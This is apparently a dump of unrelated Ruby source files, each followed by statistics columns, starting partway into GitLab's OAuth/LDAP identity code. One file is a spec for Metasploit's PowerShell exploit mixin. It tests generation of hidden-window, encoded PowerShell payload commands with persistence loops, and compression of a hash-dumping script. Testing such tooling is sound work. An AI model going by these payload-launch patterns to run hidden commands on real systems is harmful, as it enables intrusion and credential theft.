identity = gl_user.identities.find { |identity| identity.provider == auth_hash.provider }
identity ||= gl_user.identities.build(provider: auth_hash.provider)
identity.extern_uid = auth_hash.uid
if auto_link_ldap_user? && !gl_user.ldap_user? && ldap_person
log.info "Correct LDAP account has been found. identity to user: #{gl_user.username}."
gl_user.identities.build(provider: ldap_person.provider, extern_uid: ldap_person.dn)
end
end
def find_or_build_ldap_user
return unless ldap_person
user = Gitlab::Auth::LDAP::User.find_by_uid_and_provider(ldap_person.dn, ldap_person.provider)
if user
log.info "LDAP account found for user #{user.username}. Building new #{auth_hash.provider} identity."
return user
end
log.info "No user found using #{auth_hash.provider} provider. Creating a new one."
build_new_user
end
def find_by_email
return unless auth_hash.has_attribute?(:email)
::User.find_by(email: auth_hash.email.downcase)
end
def auto_link_ldap_user?
Gitlab.config.omniauth.auto_link_ldap_user
end
def creating_linked_ldap_user?
auto_link_ldap_user? && ldap_person
end
def ldap_person
return @ldap_person if defined?(@ldap_person)
# Look for a corresponding person with same uid in any of the configured LDAP providers
Gitlab::Auth::LDAP::Config.providers.each do |provider|
adapter = Gitlab::Auth::LDAP::Adapter.new(provider)
@ldap_person = find_ldap_person(auth_hash, adapter)
break if @ldap_person
end
@ldap_person
end
def find_ldap_person(auth_hash, adapter)
Gitlab::Auth::LDAP::Person.find_by_uid(auth_hash.uid, adapter) ||
Gitlab::Auth::LDAP::Person.find_by_email(auth_hash.uid, adapter) ||
Gitlab::Auth::LDAP::Person.find_by_dn(auth_hash.uid, adapter)
rescue Gitlab::Auth::LDAP::LDAPConnectionError
nil
end
def ldap_config
Gitlab::Auth::LDAP::Config.new(ldap_person.provider) if ldap_person
end
def needs_blocking?
new? && block_after_signup?
end
def signup_enabled?
providers = Gitlab.config.omniauth.allow_single_sign_on
if providers.is_a?(Array)
providers.include?(auth_hash.provider)
else
providers
end
end
def external_provider?
Gitlab.config.omniauth.external_providers.include?(auth_hash.provider)
end
def block_after_signup?
if creating_linked_ldap_user?
ldap_config.block_auto_created_users
else
Gitlab.config.omniauth.block_auto_created_users
end
end
def auth_hash=(auth_hash)
@auth_hash = AuthHash.new(auth_hash)
end
def find_by_uid_and_provider
identity = Identity.with_extern_uid(auth_hash.provider, auth_hash.uid).take
identity&.user
end
def build_new_user
user_params = user_attributes.merge(skip_confirmation: true)
Users::BuildService.new(nil, user_params).execute(skip_authorization: true)
end
def user_attributes
# Give preference to LDAP for sensitive information when creating a linked account
if creating_linked_ldap_user?
username = ldap_person.username.presence
email = ldap_person.email.first.presence
end
username ||= auth_hash.username
email ||= auth_hash.email
valid_username = ::Namespace.clean_path(username)
uniquify = Uniquify.new
valid_username = uniquify.string(valid_username) { |s| !NamespacePathValidator.valid_path?(s) }
name = auth_hash.name
name = valid_username if name.strip.empty?
{
name: name,
username: valid_username,
email: email,
password: auth_hash.password,
password_confirmation: auth_hash.password,
password_automatically_set: true
}
end
def sync_profile_from_provider?
Gitlab::Auth::OAuth::Provider.sync_profile_from_provider?(auth_hash.provider)
end
def update_profile
clear_user_synced_attributes_metadata
return unless sync_profile_from_provider? || creating_linked_ldap_user?
metadata = gl_user.build_user_synced_attributes_metadata
if sync_profile_from_provider?
UserSyncedAttributesMetadata::SYNCABLE_ATTRIBUTES.each do |key|
if auth_hash.has_attribute?(key) && gl_user.sync_attribute?(key)
gl_user[key] = auth_hash.public_send(key) # rubocop:disable GitlabSecurity/PublicSend
metadata.set_attribute_synced(key, true)
else
metadata.set_attribute_synced(key, false)
end
end
metadata.provider = auth_hash.provider
end
if creating_linked_ldap_user? && gl_user.email == ldap_person.email.first
metadata.set_attribute_synced(:email, true)
metadata.provider = ldap_person.provider
end
end
def clear_user_synced_attributes_metadata
gl_user&.user_synced_attributes_metadata&.destroy
end
def log
Gitlab::AppLogger
end
def oauth_provider_disabled?
Gitlab::CurrentSettings.current_application_settings
.disabled_oauth_sign_in_sources
.include?(auth_hash.provider)
end
end
end
end
end
| 30.958491 | 123 | 0.615553 |
1a8f73613a126ee080e6cdb9036cf85d4e2bc242 | 562 | # frozen_string_literal: true
require 'rails_helper'
describe "collections/_form_metadata.html.erb" do
let(:collection) { build(:collection) }
let(:form) { Sufia::Forms::CollectionForm.new(collection) }
let(:page) do
view.simple_form_for form do |f|
render 'collections/form_metadata.html.erb', f: f
end
Capybara::Node::Simple.new(rendered)
end
before { stub_template 'collections/_form_permission.html.erb' => '' }
it "renders the metadata fields" do
expect(page).to have_selector("input#collection_title")
end
end
| 26.761905 | 72 | 0.711744 |
f7c7075ab71827940a8a17f1c04ddd9deb584b98 | 205 | def multiply(x,y)
x*y
end
print "Insert the first integer number: "
num1 = gets.chomp.to_i
print "Insert the second integer number: "
num2 = gets.chomp.to_i
puts "#{num1}*#{num2}=#{multiply(num1,num2)}" | 22.777778 | 45 | 0.707317 |
e809106f0a323acb1e65a53ca20e24d10fcc8142 | 156 | # This file is used by Rack-based servers to start the application.
require ::File.expand_path('../config/environment', __FILE__)
run Molamp::Application
| 31.2 | 67 | 0.769231 |
ed4bfbbee6f476646f498ca5a63266b1759cfb76 | 219 | require "rack/pooledthrottle/version"
require 'rack'
require 'connection_pool'
require 'rack/pooledthrottle/throttle'
require 'rack/pooledthrottle/memcached_throttle'
module Rack
module PooledThrottle
end
end
| 18.25 | 48 | 0.808219 |
21835d80267700dce5f21b8251de0e50394f0682 | 3,104 | # This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup).
#
# Examples:
#
# movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }])
# Character.create(name: 'Luke', movie: movies.first)
admin = User.create(user_name: "admin", email: "[email protected]", password: "password", admin: true)
user01 = User.create(user_name: "user01", email: "[email protected]", password: "password", admin: false)
user02 = User.create(user_name: "user02", email: "[email protected]", password: "password", admin: false)
user03 = User.create(user_name: "user03", email: "[email protected]", password: "password", admin: false)
#PROJECTS
project01 = Project.create(project_name: 'Project 01', description: 'Promo video for AWS and Pitney Bowes')
project02 = Project.create(project_name: 'Project 02', description: 'Promo video for Autodesk featuring AutoCAD')
project03 = Project.create(project_name: 'Project 03', description: 'Promo video for Splunk')
#UsersProject
userproject01 = Userproject.create(user_id: user01.id, project_id: project01.id)
userproject02 = Userproject.create(user_id: user02.id, project_id: project02.id)
userproject03 = Userproject.create(user_id: user01.id, project_id: project02.id)
userproject04 = Userproject.create(user_id: user03.id, project_id: project01.id)
userproject05 = Userproject.create(user_id: user02.id, project_id: project01.id)
#VIDEOS
video01 = Video.create(url:'https://player.vimeo.com/video/225178837',version: 1, video_name: 'AWS | Pitney Bowes', project_id: project01.id, approval: true)
video02 = Video.create(url:'https://player.vimeo.com/video/226518977',version: 1, video_name: 'AutoCAD | Behind the Scenes', project_id: project02.id)
video03 = Video.create(url:'https://player.vimeo.com/video/217564062', version: 1, video_name: 'SPLUNK', project_id: project03.id)
#COMMENTS
#comment01 = Comment.create(content: 'Video 1 Comment 01a', timecode: Time.new(2015, 12, 8, 10, 19), user_id:user01.id, video_id:video01.id)
comment02 = Comment.create(content: 'Video 1 Comment 02', timecode: "00:00:00", user_id:user02.id, video_id:video01.id)
comment03 = Comment.create(content: 'Video 1 Comment 03', timecode: "00:00:00", user_id:user03.id, video_id:video01.id)
comment04 = Comment.create(content: 'Video 2 Comment 01', timecode: "00:00:00", user_id:user01.id, video_id:video02.id)
comment05 = Comment.create(content: 'Video 2 Comment 02', timecode: "00:00:00", user_id:user02.id, video_id:video02.id)
comment06 = Comment.create(content: 'Video 2 Comment 03', timecode: "00:00:00", user_id:user03.id, video_id:video02.id)
comment07 = Comment.create(content: 'Video 3 Comment 01', timecode: "00:00:00", user_id:user01.id, video_id:video03.id)
comment08 = Comment.create(content: 'Video 3 Comment 02', timecode: "00:00:00", user_id:user02.id, video_id:video03.id)
comment09 = Comment.create(content: 'Video 3 Comment 03', timecode: "00:00:00", user_id:user03.id, video_id:video03.id)
| 57.481481 | 157 | 0.750322 |
e20af2c7f1d7e05e13d098cd53c3d964969f8c8c | 503 | require 'rake'
module TaskExampleGroup
extend ActiveSupport::Concern
included do
let(:task_name) { self.class.top_level_description.sub(/\Arake /, '') }
let(:tasks) { Rake::Task }
subject(:task) { tasks[task_name] }
end
end
RSpec.configure do |config|
config.define_derived_metadata(file_path: %r{/spec/tasks/}) do |metadata|
metadata[:type] = :task
end
config.include TaskExampleGroup, type: :task
config.before(:suite) do
Rails.application.load_tasks
end
end
| 20.12 | 75 | 0.701789 |
399cc91c35cf26b16102801ff1cefb19c4f1d074 | 1,177 | module BittrexRb
module Endpoints
class Market < Base
# parameter - required - description
# market - required - a string literal for the market (ex: BTC-LTC)
# quantity - required - the amount to purchase
# rate - required - the rate at which to place the order.
def buylimit(pair, quantity, rate)
res = sget("/buylimit", {market: pair, quantity: quantity, rate: rate})
::BittrexRb::Response::Market.new(res)
end
# parameter - required - description
# market - required - a string literal for the market (ex: BTC-LTC)
# quantity - required - the amount to purchase
# rate - required - the rate at which to place the order
def selllimit(pair, quantity, rate)
res = sget("/selllimit", {market: pair, quantity: quantity, rate: rate})
::BittrexRb::Response::Market.new(res)
end
# parameter - required - description
# uuid - required - uuid of buy or sell order
def cancelorder(uuid)
res = sget("/cancel", {uuid: uuid})
::BittrexRb::Response::Market.new(res)
end
def uri_modifier; '/market'; end
end
end
end
| 33.628571 | 80 | 0.621071 |
e99ccaafd4bcf01e0776604ce5aa9e7fab85c4ae | 187 | RSpec.describe Deckrefcard do
it "has a version number" do
expect(Deckrefcard::VERSION).not_to be nil
end
it "does something useful" do
expect(false).to eq(true)
end
end
| 18.7 | 46 | 0.71123 |
187f463977ef91a0f6c91b543c9fb271e50dcf34 | 2,303 | # frozen_string_literal: true
require 'yaml'
control 'postgresql-replication._mapdata' do
title '`map.jinja` should match the reference file'
### Method
# The steps below for each file appear convoluted but they are both required
# and similar in nature:
# 1. The earliest method was to simply compare the files textually but this often
# led to false positives due to inconsistencies (e.g. spacing, ordering)
# 2. The next method was to load the files back into YAML structures and then
# compare but InSpec provided block diffs this way, unusable by end users
# 3. The final step was to dump the YAML structures back into a string to use
# for the comparison; this both worked and provided human-friendly diffs
### Comparison file for the specific platform
### Static, adjusted as part of code contributions, as map data is changed
# Strip the `platform[:finger]` version number down to the "OS major release"
platform_finger = system.platform[:finger].split('.').first.to_s
# Use that to set the path to the file (relative to the InSpec suite directory)
mapdata_file_path = "_mapdata/#{platform_finger}.yaml"
# Load the mapdata from profile, into a YAML structure
# https://docs.chef.io/inspec/profiles/#profile-files
mapdata_file_yaml = YAML.load(inspec.profile.file(mapdata_file_path))
# Dump the YAML back into a string for comparison
mapdata_file_dump = YAML.dump(mapdata_file_yaml)
### Output file produced by running the `_mapdata` state
### Dynamic, generated during Kitchen's `converge` phase
# Derive the location of the dumped mapdata (differs for Windows)
output_dir = platform[:family] == 'windows' ? '/temp' : '/tmp'
# Use that to set the path to the file (absolute path, i.e. within the container)
output_file_path = "#{output_dir}/salt_mapdata_dump.yaml"
# Load the output into a YAML structure using InSpec's `yaml` resource
# https://github.com/inspec/inspec/blob/49b7d10/lib/inspec/resources/yaml.rb#L29
output_file_yaml = yaml(output_file_path).params
# Dump the YAML back into a string for comparison
output_file_dump = YAML.dump(output_file_yaml)
describe 'File content' do
it 'should match profile map data exactly' do
expect(output_file_dump).to eq(mapdata_file_dump)
end
end
end
| 47.979167 | 83 | 0.746418 |
f8136989675cb2d561dbfbc5017134f1b6c5375b | 1,688 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'rails_select_on_includes/version'
Gem::Specification.new do |spec|
spec.name = "rails_select_on_includes"
spec.version = RailsSelectOnIncludes::VERSION
spec.authors = ["alekseyl"]
spec.email = ["[email protected]"]
spec.summary = %q{Patching rails include/select/virtual attributes issue}
spec.description = %q{Patching rails include/select/virtual attributes issue ( https://github.com/rails/rails/issues/15185 )}
spec.homepage = "https://github.com/alekseyl/rails_select_on_includes"
spec.license = "MIT"
# Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
# to allow pushing to a single host or delete this section to allow pushing to any host.
if spec.respond_to?(:metadata)
spec.metadata['allowed_push_host'] = "https://rubygems.org"
else
raise "RubyGems 2.0 or newer is required to protect against " \
"public gem pushes."
end
spec.files = `git ls-files -z`.split("\x0").reject do |f|
f.match(%r{^(test|spec|features)/})
end
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
spec.add_dependency "activerecord", ">=5.2.1"
spec.add_development_dependency "rails", ">=5.2.1"
spec.add_development_dependency "bundler", "~> 1.13"
spec.add_development_dependency "rake", "~> 10.0"
spec.add_development_dependency 'sqlite3'
spec.add_development_dependency 'byebug'
spec.add_development_dependency 'niceql'
end
| 38.363636 | 129 | 0.697275 |
f774a23dfd8b64446a5fda2089b9757df2b09786 | 713 | require 'push_type_core'
require 'push_type_api'
require 'coffee-rails'
require 'sass-rails'
require 'haml-rails'
require 'foundation-rails'
require 'foundation-icons-sass-rails'
require 'jquery-rails'
require 'pickadate-rails'
require 'selectize-rails'
require 'codemirror-rails'
require 'wysiwyg-rails'
require 'font-awesome-rails'
require 'turbolinks'
require 'breadcrumbs'
require 'kaminari'
require 'premailer/rails'
module PushType
def self.admin_assets
@@admin_assets ||= PushType::Admin::Assets.new
end
module Admin
PushType.register_engine self, mount: 'admin'
end
end
require 'push_type/admin/assets'
require 'push_type/admin/engine'
require 'push_type/breadcrumbs/foundation'
| 19.27027 | 50 | 0.776999 |
28875a74ced67b2d085ceac64e8a2b74374b6499 | 15,599 | # -*- coding:binary -*-
require 'spec_helper'
require 'msf/core'
require 'msf/core/exploit/powershell'
def decompress(code)
Rex::Exploitation::Powershell::Script.new(code).decompress_code
end
describe Msf::Exploit::Powershell do
subject do
mod = Msf::Exploit.allocate
mod.extend described_class
mod.send(:initialize, {})
mod.datastore['Verbose'] = true
mod
end
let(:example_script) do
File.join(Msf::Config.data_directory, "exploits", "powershell", "powerdump.ps1")
end
let(:payload) do
Rex::Text.rand_text_alpha(120)
end
let(:arch) do
'x86'
end
describe "::encode_script" do
it 'should read and encode a sample script file' do
script = subject.encode_script(example_script)
script.should be
script.length.should be > 0
end
end
describe "::compress_script" do
context 'when default datastore is set' do
it 'should create a compressed script' do
script = File.read(example_script)
compressed = subject.compress_script(script)
compressed.length.should be < script.length
compressed.include?('IO.Compression').should be_truthy
end
it 'should create a compressed script with eof' do
script = File.read(example_script)
compressed = subject.compress_script(script, 'end_of_file')
compressed.include?('end_of_file').should be_truthy
end
end
context 'when strip_comments is true' do
before do
subject.datastore['Powershell::strip_comments'] = true
subject.options.validate(subject.datastore)
end
it 'should strip comments' do
script = File.read(example_script)
compressed = subject.compress_script(script)
compressed.length.should be < script.length
end
end
context 'when strip_comment is false' do
before do
subject.datastore['Powershell::strip_comments'] = false
subject.options.validate(subject.datastore)
end
it 'shouldnt strip comments' do
script = File.read(example_script)
compressed = subject.compress_script(script)
compressed.length.should be < script.length
end
end
context 'when strip_whitespace is true' do
before do
subject.datastore['Powershell::strip_comments'] = false
subject.datastore['Powershell::strip_whitespace'] = true
subject.options.validate(subject.datastore)
end
it 'should strip whitespace' do
script = File.read(example_script)
compressed = subject.compress_script(script)
decompress(compressed).length.should be < script.length
end
end
context 'when strip_whitespace is false' do
before do
subject.datastore['Powershell::strip_comments'] = false
subject.datastore['Powershell::strip_whitespace'] = false
subject.options.validate(subject.datastore)
end
it 'shouldnt strip whitespace' do
script = File.read(example_script)
compressed = subject.compress_script(script)
expect(decompress(compressed).length).to eq(script.length)
end
end
context 'when sub_vars is true' do
before do
subject.datastore['Powershell::sub_vars'] = true
subject.options.validate(subject.datastore)
end
it 'should substitute variables' do
script = File.read(example_script)
compressed = subject.compress_script(script)
decompress(compressed).include?('$hashes').should be_falsey
end
end
context 'when sub_vars is false' do
before do
subject.datastore['Powershell::sub_vars'] = false
subject.options.validate(subject.datastore)
end
it 'shouldnt substitute variables' do
script = File.read(example_script)
compressed = subject.compress_script(script)
decompress(compressed).include?('$hashes').should be_truthy
end
end
context 'when sub_funcs is true' do
before do
subject.datastore['Powershell::sub_funcs'] = true
subject.options.validate(subject.datastore)
end
it 'should substitute functions' do
script = File.read(example_script)
compressed = subject.compress_script(script)
decompress(compressed).include?('DumpHashes').should be_falsey
end
end
context 'when sub_funcs is false' do
before do
subject.datastore['Powershell::sub_funcs'] = false
subject.options.validate(subject.datastore)
end
it 'shouldnt substitute variables' do
script = File.read(example_script)
compressed = subject.compress_script(script)
decompress(compressed).include?('DumpHashes').should be_truthy
end
end
end
describe "::run_hidden_psh" do
let(:encoded) do
false
end
context 'when x86 payload' do
it 'should generate code' do
code = subject.run_hidden_psh(payload, arch, encoded)
code.include?('syswow64').should be_truthy
end
end
context 'when x64 payload' do
it 'should generate code' do
code = subject.run_hidden_psh(payload, 'x86_64', encoded)
code.include?('sysnative').should be_truthy
end
end
context 'when encoded' do
it 'should generate a code including an encoded command' do
code = subject.run_hidden_psh(payload, arch, true)
code.include?('-nop -w hidden -e ').should be_truthy
end
end
context 'when command' do
it 'should generate code including a -c command' do
code = subject.run_hidden_psh(payload, arch, encoded)
code.include?('-nop -w hidden -c ').should be_truthy
end
end
context 'when old' do
before do
subject.datastore['Powershell::method'] = 'old'
subject.options.validate(subject.datastore)
end
it 'should generate a code including unshorted args' do
code = subject.run_hidden_psh(payload, arch, encoded)
code.include?('-NoProfile -WindowStyle hidden -NoExit -Command ').should be_truthy
end
end
end
describe "::cmd_psh_payload" do
context 'when payload is huge' do
it 'should raise an exception' do
except = false
begin
code = subject.cmd_psh_payload(Rex::Text.rand_text_alpha(12000), arch)
rescue RuntimeError => e
except = true
end
except.should be_truthy
end
end
context 'when persist is true' do
before do
subject.datastore['Powershell::persist'] = true
subject.options.validate(subject.datastore)
end
it 'should add a persistance loop' do
code = subject.cmd_psh_payload(payload, arch)
decompress(code).include?('while(1){Start-Sleep -s ').should be_truthy
end
end
context 'when persist is false' do
before do
subject.datastore['Powershell::persist'] = false
subject.options.validate(subject.datastore)
end
it 'shouldnt add a persistance loop' do
code = subject.cmd_psh_payload(payload, arch)
decompress(code).include?('while(1){Start-Sleep -s ').should be_falsey
end
end
context 'when prepend_sleep is set' do
before do
subject.datastore['Powershell::prepend_sleep'] = 5
subject.options.validate(subject.datastore)
end
it 'should prepend sleep' do
code = subject.cmd_psh_payload(payload, arch)
decompress(code).include?('Start-Sleep -s ').should be_truthy
end
end
context 'when prepend_sleep isnt set' do
before do
subject.datastore['Powershell::prepend_sleep'] = nil
subject.options.validate(subject.datastore)
end
it 'shouldnt prepend sleep' do
code = subject.cmd_psh_payload(payload, arch)
decompress(code).include?('Start-Sleep -s ').should be_falsey
end
end
context 'when prepend_sleep is 0' do
before do
subject.datastore['Powershell::prepend_sleep'] = 0
subject.options.validate(subject.datastore)
end
it 'shouldnt prepend sleep' do
code = subject.cmd_psh_payload(payload, arch)
decompress(code).include?('Start-Sleep -s ').should be_falsey
end
end
context 'when method is old' do
before do
subject.datastore['Powershell::method'] = 'old'
subject.options.validate(subject.datastore)
end
it 'should generate a command line' do
code = subject.cmd_psh_payload(payload, arch)
decompress(code).include?('-namespace Win32Functions').should be_truthy
end
it 'shouldnt shorten args' do
code = subject.cmd_psh_payload(payload, arch)
code.include?('-NoProfile -WindowStyle hidden -Command').should be_truthy
end
it 'should include -NoExit' do
code = subject.cmd_psh_payload(payload, arch)
code.include?('-NoProfile -WindowStyle hidden -NoExit -Command').should be_truthy
end
end
context 'when method is net' do
before do
subject.datastore['Powershell::method'] = 'net'
subject.options.validate(subject.datastore)
end
it 'should generate a command line' do
code = subject.cmd_psh_payload(payload, arch)
decompress(code).include?('System.Runtime.InteropServices;').should be_truthy
end
end
context 'when method is reflection' do
before do
subject.datastore['Powershell::method'] = 'reflection'
subject.options.validate(subject.datastore)
end
it 'should generate a command line' do
code = subject.cmd_psh_payload(payload, arch)
decompress(code).include?('GlobalAssemblyCache').should be_truthy
end
end
context 'when method is msil' do
before do
subject.datastore['Powershell::method'] = 'msil'
subject.options.validate(subject.datastore)
end
it 'should raise an exception' do
except = false
begin
subject.cmd_psh_payload(payload, arch)
rescue RuntimeError
except = true
end
except.should be_truthy
end
end
context 'when method is unknown' do
before do
subject.datastore['Powershell::method'] = 'blah'
end
it 'should raise an exception' do
except = false
begin
subject.cmd_psh_payload(payload, arch)
rescue RuntimeError
except = true
end
except.should be_truthy
end
after do
subject.datastore['Powershell::method'] = 'reflection'
subject.options.validate(subject.datastore)
end
end
context 'when encode_inner_payload' do
it 'should contain an inner payload with -e' do
code = subject.cmd_psh_payload(payload, arch, {:encode_inner_payload => true})
code.include?(' -e ').should be_truthy
end
context 'when no_equals is true' do
it 'should raise an exception' do
except = false
begin
code = subject.cmd_psh_payload(payload, arch, {:encode_inner_payload => true, :no_equals => true})
rescue RuntimeError
except = true
end
except.should be_truthy
end
end
end
context 'when encode_final_payload' do
context 'when no_equals is false' do
it 'should contain a final payload with -e' do
code = subject.cmd_psh_payload(payload, arch, {:encode_final_payload => true, :no_equals => false})
code.include?(' -e ').should be_truthy
code.include?(' -c ').should be_falsey
end
end
context 'when no_equals is true' do
it 'should contain a final payload with -e' do
code = subject.cmd_psh_payload(payload, arch, {:encode_final_payload => true, :no_equals => true})
code.include?(' -e ').should be_truthy
code.include?(' -c ').should be_falsey
code.include?('=').should be_falsey
end
end
context 'when encode_inner_payload is true' do
it 'should raise an exception' do
except = false
begin
subject.cmd_psh_payload(payload, arch, {:encode_final_payload => true, :encode_inner_payload => true})
rescue RuntimeError
except = true
end
except.should be_truthy
end
end
end
context 'when remove_comspec' do
it 'shouldnt contain %COMSPEC%' do
code = subject.cmd_psh_payload(payload, arch, {:remove_comspec => true})
code.include?('%COMSPEC%').should be_falsey
end
end
context 'when use single quotes' do
it 'should wrap in single quotes' do
code = subject.cmd_psh_payload(payload, arch, {:use_single_quotes => true})
code.include?(' -c \'').should be_truthy
end
end
end
describe "::generate_psh_command_line" do
it 'should contain no full stop when :no_full_stop' do
opts = {:no_full_stop => true}
command = subject.generate_psh_command_line(opts)
command.include?("powershell ").should be_truthy
end
it 'should contain full stop unless :no_full_stop' do
opts = {}
command = subject.generate_psh_command_line(opts)
command.include?("powershell.exe ").should be_truthy
opts = {:no_full_stop => false}
command = subject.generate_psh_command_line(opts)
command.include?("powershell.exe ").should be_truthy
end
it 'should ensure the path should always ends with \\' do
opts = {:path => "test"}
command = subject.generate_psh_command_line(opts)
command.include?("test\\powershell.exe ").should be_truthy
opts = {:path => "test\\"}
command = subject.generate_psh_command_line(opts)
command.include?("test\\powershell.exe ").should be_truthy
end
end
describe "::generate_psh_args" do
it 'should return empty string for nil opts' do
subject.generate_psh_args(nil).should eql ""
end
command_args = [[:encodedcommand, "parp"],
[:executionpolicy, "bypass"],
[:inputformat, "xml"],
[:file, "x"],
[:noexit, true],
[:nologo, true],
[:noninteractive, true],
[:mta, true],
[:outputformat, 'xml'],
[:sta, true],
[:noprofile, true],
[:windowstyle, "hidden"],
[:command, "Z"]
]
permutations = (0..command_args.length).to_a.combination(2).map{|i,j| command_args[i...j]}
permutations.each do |perms|
opts = {}
perms.each do |k,v|
opts[k] = v
it "should generate correct arguments for #{opts}" do
opts[:shorten] = true
short_args = subject.generate_psh_args(opts)
opts[:shorten] = false
long_args = subject.generate_psh_args(opts)
opt_length = opts.length - 1
short_args.should_not be_nil
long_args.should_not be_nil
short_args.count('-').should eql opt_length
long_args.count('-').should eql opt_length
short_args[0].should_not eql " "
long_args[0].should_not eql " "
short_args[-1].should_not eql " "
long_args[-1].should_not eql " "
if opts[:command]
long_args[-10..-1].should eql "-Command Z"
short_args[-4..-1].should eql "-c Z"
end
end
end
end
end
end
| 31.769857 | 114 | 0.631258 |
038e3cadd1a08f430536c3e952554ef9a6f1e597 | 1,436 | # coding: utf-8
module KuaiJieQian
module Utils
#
# 把 hash 中的 key,都转化为 symbol 类型
# @param hash [Hash] 需要更改的 hash
#
# @return [Hash] 更改后的 hash
#
def self.symbolize_keys(hash)
new_hash = {}
hash.each do |key, value|
new_hash[(key.to_sym rescue key) || key] = value
end
new_hash
end
def self.html_to_pdf(html_file_stream)
kit = PDFKit.new(html_file_stream)
kit.to_pdf
end
def self.pdf_to_png(pdf_file_path, png_path_dir, png_name)
pngs = []
pdf = Magick::ImageList.new(pdf_file_path){self.background_color = 'white'}
pdf.each_with_index{ |obj, i|
png_file_fullname ="#{png_path_dir}/#{png_name}_#{i+1}.png"
res = obj.write(png_file_fullname)
pngs << {fullname: png_file_fullname, successd: !res.nil?}
}
# pdf = Grim.reap(pdf_file_path)
# KuaiJieQian.logger.info pdf_file_path
# KuaiJieQian.logger.info pdf
# count = pdf.count
# KuaiJieQian.logger.info count
# (0..count-1).each{ |i|
# png_file_fullname ="#{png_path_dir}/#{png_name}_#{i+1}.png"
# KuaiJieQian.logger.info i
# successd = pdf[i].save(png_file_fullname,
# {:quality => 90, :alpha => "remove", :colorspace => "RGB"})
# pngs << {fullname: png_file_fullname, successd: successd}
# }
pngs
end
end # end module
end
| 25.192982 | 91 | 0.594011 |
01e547414aba45f8ff44628ff086ae64af982633 | 455 | # frozen_string_literal: true
control 'event_edit_forward' do
describe event('uei.opennms.org/cheftest/thresholdExceeded2', 'events/chef.events.xml', [{ 'mename' => 'id', 'mevalue' => ['.1.3.6.1.4.1.11385.102.1'] }, { 'mename' => 'generic', 'mevalue' => ['6'] }, { 'mename' => 'specific', 'mevalue' => ['2'] }]) do
it { should exist }
its('forward') { should eq([{ 'info' => 'fwdInfo', 'state' => 'off', 'mechanism' => 'snmpudp' }]) }
end
end
| 56.875 | 254 | 0.593407 |
6a497e80601524711f359661501d036a6b24076f | 2,868 | require 'test_helper'
class PasswordResetsTest < ActionDispatch::IntegrationTest
def setup
ActionMailer::Base.deliveries.clear
@user = users(:chloe)
end
test "password resets" do
get new_password_reset_path
assert_template 'password_resets/new'
#invalid email
post password_resets_path, params: { password_reset: { email: "" } }
assert_not flash.empty?
assert_template 'password_resets/new'
#valid email
post password_resets_path,
params: { password_reset: { email: @user.email } }
assert_not_equal @user.reset_digest, @user.reload.reset_digest
assert_equal 1, ActionMailer::Base.deliveries.size
assert_not flash.empty?
assert_redirected_to root_url
#password reset form
user = assigns(:user)
#wrong email
get edit_password_reset_path(user.reset_token, email: "")
assert_redirected_to root_url
#innactive user
user.toggle!(:activated)
get edit_password_reset_path(user.reset_token, email: user.email)
assert_redirected_to root_url
user.toggle!(:activated)
#right email, wrong token
get edit_password_reset_path('wrong token', email: user.email)
assert_redirected_to root_url
#right email, right token
get edit_password_reset_path(user.reset_token, email: user.email)
assert_template 'password_resets/edit'
assert_select "input[name=email][type=hidden][value=?]", user.email
#invalid password & confirmation
patch password_reset_path(user.reset_token),
params: { email: user.email,
user: { password: "foobaz",
password_confirmation: "barquux" } }
assert_select 'div#error_explanation'
#empty password & password confirmation
patch password_reset_path(user.reset_token),
params: { email: user.email,
user: { password: "",
password_confirmation: ""}}
assert_select 'div#error_explanation'
#valid password and confirmation
patch password_reset_path(user.reset_token),
params: { email: user.email,
user: { password: "foobaz",
password_confirmation: "foobaz" } }
assert is_logged_in?
assert_nil user.reload.reset_digest
assert_not flash.empty?
assert_redirected_to user
end
test "expired token" do
get new_password_reset_path
post password_resets_path,
params: { password_reset: { email: @user.email } }
@user = assigns(:user)
@user.update_attribute(:reset_sent_at, 3.hours.ago)
patch password_reset_path(@user.reset_token),
params: { email: @user.email,
user: { password: "foobar",
password_confirmation: "foobar" } }
assert_response :redirect
follow_redirect!
assert_match /expired/i, response.body
end
end
| 35.85 | 72 | 0.674686 |
7918bf465de9c77160d130b73bb12f514566cd9e | 2,307 | # Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'google/apis/script_v1/service.rb'
require 'google/apis/script_v1/classes.rb'
require 'google/apis/script_v1/representations.rb'
module Google
module Apis
# Apps Script API
#
# An API for managing and executing Google Apps Script projects.
#
# @see https://developers.google.com/apps-script/api/
module ScriptV1
VERSION = 'V1'
REVISION = '20180425'
# Read, send, delete, and manage your email
AUTH_SCOPE = 'https://mail.google.com/'
# Manage your calendars
CALENDAR_FEEDS = 'https://www.google.com/calendar/feeds'
# Manage your contacts
M8_FEEDS = 'https://www.google.com/m8/feeds'
# View and manage the provisioning of groups on your domain
AUTH_ADMIN_DIRECTORY_GROUP = 'https://www.googleapis.com/auth/admin.directory.group'
# View and manage the provisioning of users on your domain
AUTH_ADMIN_DIRECTORY_USER = 'https://www.googleapis.com/auth/admin.directory.user'
# View and manage the files in your Google Drive
AUTH_DRIVE = 'https://www.googleapis.com/auth/drive'
# View and manage your forms in Google Drive
AUTH_FORMS = 'https://www.googleapis.com/auth/forms'
# View and manage forms that this application has been installed in
AUTH_FORMS_CURRENTONLY = 'https://www.googleapis.com/auth/forms.currentonly'
# View and manage your Google Groups
AUTH_GROUPS = 'https://www.googleapis.com/auth/groups'
# View and manage your spreadsheets in Google Drive
AUTH_SPREADSHEETS = 'https://www.googleapis.com/auth/spreadsheets'
# View your email address
AUTH_USERINFO_EMAIL = 'https://www.googleapis.com/auth/userinfo.email'
end
end
end
| 35.492308 | 90 | 0.713914 |
